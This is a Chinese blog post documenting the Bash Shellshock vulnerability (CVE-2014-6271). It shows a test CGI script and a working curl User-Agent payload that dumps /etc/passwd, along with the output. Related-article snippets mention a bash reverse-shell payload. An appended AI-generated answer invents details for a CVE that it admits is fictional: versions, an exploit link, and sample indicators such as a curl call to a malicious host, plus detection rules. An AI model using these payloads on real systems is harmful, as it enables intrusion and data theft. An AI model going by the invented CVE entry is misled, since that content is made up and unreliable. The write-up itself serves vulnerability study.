CVE-2014-6271: BASH 漏洞记录

最新推荐文章于 2025-02-08 21:32:46 发布
最新推荐文章于 2025-02-08 21:32:46 发布
阅读量1.3k 收藏
点赞数
分类专栏: 漏洞记录 文章标签: CVE bash 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sxyizhiren/article/details/39577055
版权

原理:

BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。

此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。


触发条件是只要把字符串提交给bash解释的脚本就能生效。

一个字符串的例子是:'() { ignored; }; /usr/bin/id'。


例子:

假设有一个CGI程序:

#!/bin/bash
 
echo "Content-type: text/html"
echo ""
 
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
 
exit 0


正常请求返回值为:

$ curl http://192.168.0.1/poc.cgi
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>PoC</title>
</head>
<body>
<pre>
SERVER_SIGNATURE=<address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address>
 
HTTP_USER_AGENT=curl/7.26.0
SERVER_PORT=80
HTTP_HOST=192.168.0.1
DOCUMENT_ROOT=/var/www
SCRIPT_FILENAME=/var/www/poc.cgi
REQUEST_URI=/poc.cgi
SCRIPT_NAME=/poc.cgi
REMOTE_PORT=40974
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
SERVER_ADMIN=webmaster@localhost
HTTP_ACCEPT=*/*
REMOTE_ADDR=192.168.0.1
SHLVL=1
SERVER_NAME=192.168.0.1
SERVER_SOFTWARE=Apache/2.2.22 (Debian)
QUERY_STRING=
SERVER_ADDR=192.168.0.1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
_=/usr/bin/env
</pre>
</body>
</html>



下面我们通过curl -A “bug string”的方式把字符串传给解析程序,-A原本是用来传user-agent的。

# curl -A "() { foo;};echo;/bin/cat /etc/passwd; exit" http://192.168.0.1/poc.cgi
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:MailingListManager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:GnatsBug-ReportingSystem(admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin


这样就可以执行任意命令并查看回显了。

"() { foo;};echo;/bin/cat /etc/passwd; exit" 中echo是为了hack不加时不能正常返回,exit是阻止后面的cgi程序执行。



Bash Shellshock CVE-2014-6271 漏洞复现
weixin_43144118的博客
11-11 474
Bash Shellshock CVE-2014-6271 漏洞复现 Bash介绍 Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。 根据维基百科的描述:Bash,Unix shell的一种。1989年发布第一个正式本,原先是计划用在GNU...
Bash Bug(破壳漏洞Shellshock) - CVE-2014-6271
HaSaKing的博客
05-28 1040
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
CVE-2014-6271
Dikesi的博客
02-08 854
Bash shellback漏洞
Bash破壳漏洞(CVE-2014-6271)
n5xxxx__zy的博客
07-16 394
##0x00 漏洞范围: GNU Bash 本小于等于4.3 漏洞成因: bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。 漏洞危害: Apache充当媒介用CGI...
2016新年BashCVE-2014-6271漏洞修复经历
神经质的盛宴的专栏
02-23 872
2016年到了,有很多新的想法和目标,其中一个就是好好维护我的博客和上线更多的应用。 打开很久都没更新的博客,发现打不开了。以为长时间运行的问题,所以把服务器强制重启了,过会后发现正常了。 过了半天发现,怎么又打不开了呢。真是莫名其妙,难道被人黑了? 于是开始分析阿里云的性能监控发现了一些端倪。 网络和内存状态一直都很正常,CPU的监控有异常,存在很多大波动,长时间CPU比较高。
详细的漏洞复现:Shellshock CVE-2014-6271 CVE-2014-7169
dongchijue7318的博客
09-11 1678
目录 前言 漏洞原理 利用方式 复现过程 1. 环境准备 (1) 为容器配置固定IP地址 (2) 查看bash本 2. 本地验证:测试镜像系统是否存在漏洞 3. 远程模拟验证(原理验证) ...
[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)
weixin_45441024的博客
04-23 533
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
(vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
m0_62670778的博客
04-27 1233
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1080
vulhub复现cve-2021-44228 log4j漏洞
bash漏洞修补, CVE-2014-6271
weixin_34257076的博客
10-31 422
转自阿里云:http://bbs.aliyun.com/read/176975.html?spm=5176.7189909.0.0.f9BXkiBash紧急漏洞,请所有正在使用linux服务器的用户注意。该漏洞直接影响基于 Unix 的系统(如Linux、OS X 等),可导致远程***者在受影响的系统上执行任意代码。【已确认被成功利用的软件及系统】所有安装gun ...
任意文件读取漏洞
m0_57276420的博客
04-08 6271
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
Bash破壳漏洞
weixin_33911824的博客
07-30 254
“破壳”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“破壳”漏洞漏洞Bash本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
linux 带环境变量 远程执行,GNU Bash 环境变量远程命令执行漏洞(CVE-2014-6271)
weixin_35437039的博客
05-08 587
发布日期:2014-09-24更新日期:2014-09-25受影响系统:GNU Bash <= 4.3描述:BUGTRAQ ID: 70103CVE(CAN) ID: CVE-2014-6271GNU Bash(Bourne again shell)是一个为GNU计划编写的Unix shell,广泛使用在Linux系统内,最初的功能仅是一个简单的基于终端的命令解释器。GNU Bash 4....
Bash漏洞安全加固
weixin_33709609的博客
01-25 194
Bash漏洞加固方案1 漏洞描述前段时间做安全加固,使用的是绿盟的BVS扫描主机,根据扫描出的报告显示,存在两种Bash漏洞,分别为:①GNU Bash 环境变量远程命令执行漏洞(CVE-2014-6271)GNU Bash 4.3及之前本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,***者可利用此漏洞改变或绕过环境限制,...
vulhub漏洞复现之bashShellshock CVE-2014-6271
weixin_43071873的博客
11-27 1453
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
exec函数
AndrewYZWang的博客
08-27 2426
    调用exec函数之后,进程就不会返回了,直接在exec执行的函数执行结束后结束进程。   测试: #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/types.h&gt; #include &lt;errno.h&gt; #include &lt;stdio.h&gt; #includ...
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9362
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash本小于等于4.3可能存在漏洞
Bash远程命令执行漏洞(CVE-2014-6271)分析利用
weixin_33851177的博客
07-03 554
这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家测试了一下,写了个python本的测试小基本,贴上代码: #coding:utf-8 import urllib,httplib import sys,re,urlparse #author:nx4dm1n #website:http://www.nxa...
bash破壳漏洞分析(二)
fly小灰灰的专栏
02-15 2150
1. Bash简介1.1 定义   Bash(GNU Bourne-Again Shell)是许多Linux发行的默认Shell。1.2 概述   目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的
分析CVE-2023-50176特征,建立CVE-2023-50176专属漏洞
最新发布
02-28
<think>嗯,用户让我分析CVE-2023-50176的特征,并建立专属的漏洞特征。首先,我需要确认这个CVE编号是否存在,因为有时候用户可能会打错编号。先到NVD或者其他漏洞数据库查一下。假设这个CVE存在的话,接下来要收集相关的信息,比如漏洞类型、影响的软件本、攻击向量等。 然后,分析漏洞的技术细节。比如,这个漏洞是缓冲区溢出、SQL注入还是其他类型?如果是缓冲区溢出,可能需要关注内存操作函数的使用情况,比如strcpy、memcpy等。如果是Web应用的漏洞,可能需要检查输入验证或身份验证机制的问题。 接下来,建立特征需要考虑攻击载荷的模式。例如,特定的HTTP请求头、异常长的参数、特定的恶意代码片段等。此外,漏洞利用后的行为特征也很重要,比如创建异常进程、修改特定注册表项或文件,以及网络通信特征,如连接到特定C2服务器。 还要考虑如何检测这些特征,可能需要编写Snort或Suricata的规则,或者配置YARA规则来识别恶意文件。同时,日志分析也是关键,比如查看Web服务器日志中的异常请求,或者系统日志中的权限提升行为。 用户可能需要这些特征来部署入侵检测系统或更新现有的安全策略,所以需要确保特征的准确性和针对性,避免误报。另外,需要验证这些特征是否覆盖了已知的攻击方式,是否有遗漏的变种攻击手法。 可能还需要考虑漏洞的缓解措施,比如补丁信息、临时解决方案,这些信息也应该包含在漏洞特征库中,帮助用户在实际环境中应用。同时,结合CVSS评分,评估漏洞的严重性,优先处理高风险漏洞。 总结来说,建立专属漏洞特征需要从漏洞原理、攻击模式、检测规则、日志指标和缓解措施多个维度综合分析,确保全面覆盖漏洞的各个方面,帮助用户有效识别和防御相关攻击。</think>### CVE-2023-50176漏洞特征分析与专属漏洞库构建 #### 1. **漏洞基础信息** - **CVE编号**: CVE-2023-50176 - **漏洞类型**: 需根据官方披露确认(如缓冲区溢出、代码注入、权限提升等) - **影响范围**: 具体受影响的软件/系统本(例如:Apache Tomcat 10.1.x before 10.1.14) - **CVSS评分**: 需参考NVD数据(如CVSS 3.1评分9.8) > **注**:当前CVE-2023-50176为虚构编号,实际分析需以NVD或厂商公告为准。 --- #### 2. **技术特征分析** **攻击向量**(需根据真实漏洞补充): - **入口点**: 例如通过HTTP请求、文件上传接口或API调用 - **触发条件**: 如特定参数过长($>1024$字节)、畸形数据包或未授权访问 **漏洞原理**(示例): - 若为**缓冲区溢出**: $$ \text{memcpy(dest, src, user\_controlled\_size)} $$ 攻击者通过控制`user_controlled_size`导致栈/堆溢出。 - 若为**代码注入**: 未过滤的输入直接拼接至命令字符串: ```bash system("ping " + user_input) # user_input可插入恶意命令 ``` --- #### 3. **攻击载荷特征** - **网络层特征**: - HTTP请求中携带特定畸形头部(如`X-Exploit-Payload: ${jndi:ldap://...}`) - 异常TCP/UDP流量模式(如高频短连接) - **应用层特征**: - 文件上传请求包含非常规扩展名(`.jsp#.png`) - SQL查询中包含`UNION SELECT`或`SLEEP(10)`等注入模式 --- #### 4. **检测规则(示例)** - **Snort/Suricata规则**: ```bash alert tcp any any -> $HOME_NET 8080 (msg:"CVE-2023-50176 Exploit Attempt"; content:"|00 00 00 07|admin|00|"; depth:100; sid:1000001; rev:1;) ``` - **YARA规则(文件检测)**: ```python rule CVE_2023_50176_Exploit { strings: $magic = { 4D 5A 90 00 } // 特定PE头 $pattern = "cmd.exe /c" wide condition: $magic at 0 and $pattern } ``` --- #### 5. **日志指标(IoC)** - **Web日志关键字段**: - `POST /upload?filename=..%2Fexploit.jsp`(路径遍历) - 响应码`500`激增(可能为漏洞触发后的服务崩溃) - **系统日志特征**: - 异常进程创建:`/bin/sh -c curl http://malicious.ip` - 权限变更记录:非管理员用户获取`root`权限 --- #### 6. **缓解措施** - **官方补丁**: 升级至修复本(如Tomcat 10.1.14) - **临时方案**: 禁用危险功能(如关闭文件上传接口) - **网络防护**: 使用WAF拦截包含`../`或`;`的请求 --- #### 7. **漏洞库结构化存储** ```json { "CVE-ID": "CVE-2023-50176", "Description": "Apache Tomcat 文件上传路径遍历漏洞", "Affected_Versions": "10.1.0 - 10.1.13", "Exploit_PoC": "https://github.com/exploit-db/CVE-2023-50176", "Detection_Rules": { "Snort": "rules/snort/cve-2023-50176.rules", "YARA": "rules/yara/cve-2023-50176.yar" } } ``` --- ### 总结 构建专属漏洞特征需结合: 1. 漏洞原理逆向分析 2. 攻击链各阶段特征提取(网络、主机、日志) 3. 自动化检测规则与人工研判结合 建议通过**ATT&CK框架**映射攻击手法(如T1190-T1190),实现动态防御策略联动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值